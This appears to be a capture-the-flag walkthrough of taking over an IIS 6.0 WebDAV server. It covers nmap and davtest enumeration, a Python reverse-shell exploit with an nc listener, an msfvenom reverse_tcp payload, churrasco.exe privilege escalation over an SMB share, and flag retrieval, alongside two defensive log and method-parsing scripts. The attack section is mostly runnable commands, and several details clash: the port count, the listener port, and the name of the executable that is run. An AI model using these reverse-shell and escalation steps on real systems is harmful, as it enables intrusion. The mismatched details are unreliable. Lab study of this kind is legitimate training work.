Scanning and Enumeration:
nmap:
nmap -sC -sV -O 10.10.10.14
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-10 09:23 EDT
Nmap scan report for 10.10.10.14
Host is up (0.27s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Date: Sun, 10 Sep 2023 13:23:46 GMT
| WebDAV type: Unknown
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
..
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.83 seconds
Three ports are open:
80/tcp open http Microsoft IIS httpd 6.0
Opening http://10.10.10.14 shows the page "Under Construction".
The web server is Microsoft IIS with the WebDAV protocol enabled.
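As an added example (not part of the original write-up), the following Python script parses the http-webdav-scan block from the scan above and separates the methods the server reports in its Allow header ("Allowed Methods") from those in its Public header ("Public Options"). Allow lists what is permitted on the requested resource, while Public advertises what the server implements at all, so PUT and MKCOL showing up only under Public is worth noting before any upload test is interpreted. The sample text is copied from the scan output above; the method categories are this example's own choice.

```python
import re

# The http-webdav-scan block exactly as nmap printed it in the scan above.
SCAN_OUTPUT = """\
| http-webdav-scan:
|   Server Type: Microsoft-IIS/6.0
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Date: Sun, 10 Sep 2023 13:23:46 GMT
|   WebDAV type: Unknown
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
"""

# Categories are this example's own choice: methods that change content or state,
# and methods that reveal server internals or the directory tree.
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH", "LOCK", "UNLOCK"}
DISCLOSURE_METHODS = {"TRACE", "PROPFIND", "SEARCH"}

# Matches the two list lines; the leading "|" or "|_" is nmap's tree decoration.
_LINE = re.compile(r"^\|_?\s*(Allowed Methods|Public Options):\s*(.*)$")


def parse_method_lists(text):
    """Return {'allowed': set, 'public': set} from an nmap http-webdav-scan block."""
    result = {"allowed": set(), "public": set()}
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        key = "allowed" if m.group(1) == "Allowed Methods" else "public"
        result[key] = {tok.strip().upper() for tok in m.group(2).split(",") if tok.strip()}
    return result


def assess(methods):
    """Split the advertised methods into what a defender should look at first."""
    allowed, public = methods["allowed"], methods["public"]
    return {
        # write methods the Allow header says are permitted on the probed resource
        "write_allowed": sorted(allowed & WRITE_METHODS),
        # write methods the server implements (Public) but does not allow on this resource
        "write_public_only": sorted((public - allowed) & WRITE_METHODS),
        # methods that leak information regardless of write access
        "disclosure": sorted((allowed | public) & DISCLOSURE_METHODS),
    }


if __name__ == "__main__":
    report = assess(parse_method_lists(SCAN_OUTPUT))
    for k, v in report.items():
        print(f"{k}: {', '.join(v) or '-'}")
```

On this scan the script reports COPY, LOCK and UNLOCK as permitted write methods, PUT, DELETE, MKCOL, MOVE and PROPPATCH as implemented but not permitted on the root resource, and TRACE, PROPFIND and SEARCH as disclosure methods; an IIS 6.0 server that still answers for any of these on an internet-facing port is the finding to escalate, since the product itself is long out of support.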
davtest:
Tool introduction: https://zing.gitbooks.io/kali-lunix/content/06x/6x07_DAVTest.html
Use davtest to test which methods can be used.
After testing, no method turns out to be usable.
davtest -url http://10.10.10.14
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.14
********************************************************
NOTE Random string for this session: rew4ZMFiMdVl8tu
********************************************************
Creating directory
MKCOL FAIL
********************************************************
Sending test files
PUT html FAIL
PUT aspx FAIL
PUT php FAIL
PUT cfm FAIL
PUT asp FAIL
PUT shtml FAIL
PUT txt FAIL
PUT jhtml FAIL
PUT pl FAIL
PUT cgi FAIL
PUT jsp FAIL
********************************************************
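From the defender's side, a davtest run like the one above leaves a recognisable trace in the IIS W3C log: one MKCOL followed by a burst of PUT requests for the same random file name with a different extension each time, all within a couple of seconds. The following Python script is an added example, not part of the original write-up; it parses a W3C extended log by its #Fields header and flags any client that issues several WebDAV write-method requests inside a short window. The log lines are constructed for this example (reusing the session string from the davtest output above); the User-Agent values and the davtest file-naming scheme are assumptions.

```python
from collections import defaultdict
from datetime import datetime

# Constructed IIS 6.0 W3C extended log sample (not real data). The session string
# from the davtest run above is reused for the file names; the User-Agent values
# and the davtest naming scheme are assumptions made for this example.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2023-09-10 13:20:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2023-09-10 13:20:01 10.10.10.14 GET /default.htm - 80 - 10.10.14.5 Mozilla/5.0 200 0 0
2023-09-10 13:25:10 10.10.10.14 OPTIONS / - 80 - 10.10.14.5 DAV.pm 200 0 0
2023-09-10 13:25:11 10.10.10.14 MKCOL /DavTestDir_rew4ZMFiMdVl8tu - 80 - 10.10.14.5 DAV.pm 403 0 0
2023-09-10 13:25:12 10.10.10.14 PUT /DavTestDir_rew4ZMFiMdVl8tu/davtest_rew4ZMFiMdVl8tu.html - 80 - 10.10.14.5 DAV.pm 403 0 0
2023-09-10 13:25:12 10.10.10.14 PUT /DavTestDir_rew4ZMFiMdVl8tu/davtest_rew4ZMFiMdVl8tu.aspx - 80 - 10.10.14.5 DAV.pm 403 0 0
2023-09-10 13:25:13 10.10.10.14 PUT /DavTestDir_rew4ZMFiMdVl8tu/davtest_rew4ZMFiMdVl8tu.php - 80 - 10.10.14.5 DAV.pm 403 0 0
2023-09-10 13:40:00 10.10.10.14 PROPFIND / - 80 - 192.0.2.7 Microsoft-WebDAV-MiniRedir/6.1 207 0 0
"""

# WebDAV/HTTP methods that create, modify, move or delete server-side content.
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH"}


def parse_w3c(text):
    """Parse a W3C extended log into dicts keyed by the names in the #Fields line."""
    fields, rows = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than mis-align the columns
        rows.append(dict(zip(fields, values)))
    return rows


def _extension(uri_stem):
    """File extension of the last path segment, or None if it has none."""
    name = uri_stem.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else None


def find_webdav_write_bursts(rows, window_seconds=60, min_count=3):
    """Flag clients that send >= min_count write-method requests within window_seconds.

    Returns {client_ip: {"burst": n, "methods": [...], "denied": n, "extensions": [...]}}.
    """
    per_client = defaultdict(list)
    for r in rows:
        method = r.get("cs-method", "").upper()
        if method not in WRITE_METHODS:
            continue
        ts = datetime.strptime(f"{r['date']} {r['time']}", "%Y-%m-%d %H:%M:%S")
        per_client[r["c-ip"]].append((ts, method, r["cs-uri-stem"], int(r["sc-status"])))

    alerts = {}
    for ip, events in per_client.items():
        events.sort()
        # Sliding window over the sorted timestamps: largest count within window_seconds.
        best, start = 0, 0
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_count:
            alerts[ip] = {
                "burst": best,
                "methods": sorted({e[1] for e in events}),
                # 4xx responses: the server refused, as in the davtest run above
                "denied": sum(1 for e in events if 400 <= e[3] < 500),
                "extensions": sorted({_extension(e[2]) for e in events} - {None}),
            }
    return alerts


if __name__ == "__main__":
    for ip, info in find_webdav_write_bursts(parse_w3c(SAMPLE_LOG)).items():
        print(f"{ip}: {info['burst']} write requests in a burst, methods={info['methods']}, "
              f"denied={info['denied']}, extensions={info['extensions']}")
```

The PROPFIND from the second client is a read and is deliberately not counted, so a normal WebDAV mapped-drive client does not trip the rule; the point of the "denied" counter is that a run of 403s still merits attention, because it shows someone is probing for a writable location even though the server held.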
Exploit:
Use the reverse shell script iis6_reverse_shell.py.
It needs the following arguments: 1. Target IP 2. Target Port 3. Listener IP 4. Listener Port
rlwrap nc -lnvp 4444
python2 iis6_reverse_shell.py 10.10.10.14 80 10.10.14.5 4444
listening on [any] 5555 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.14] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
nt authority\network service
Privilege Escalation:
churrasco.exe:
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=8888 -f exe -a x86 --platform windows -o shell.exe
impacket-smbserver share .
Move to C:\WINDOWS\Temp first; only there is there permission to transfer files to the victim machine.
copy \\10.10.14.5\share\churrasco.exe .
copy \\10.10.14.5\share\shell.exe .
Start the privilege escalation!
rlwrap nc -lnvp 8888
churrasco.exe "privesc.exe"
Get FLAG:
C:\Documents and Settings\Administrator\Desktop>type root.txt
9359e905...
C:\Documents and Settings\Lakis\Desktop>type user.txt
bdff5ec6...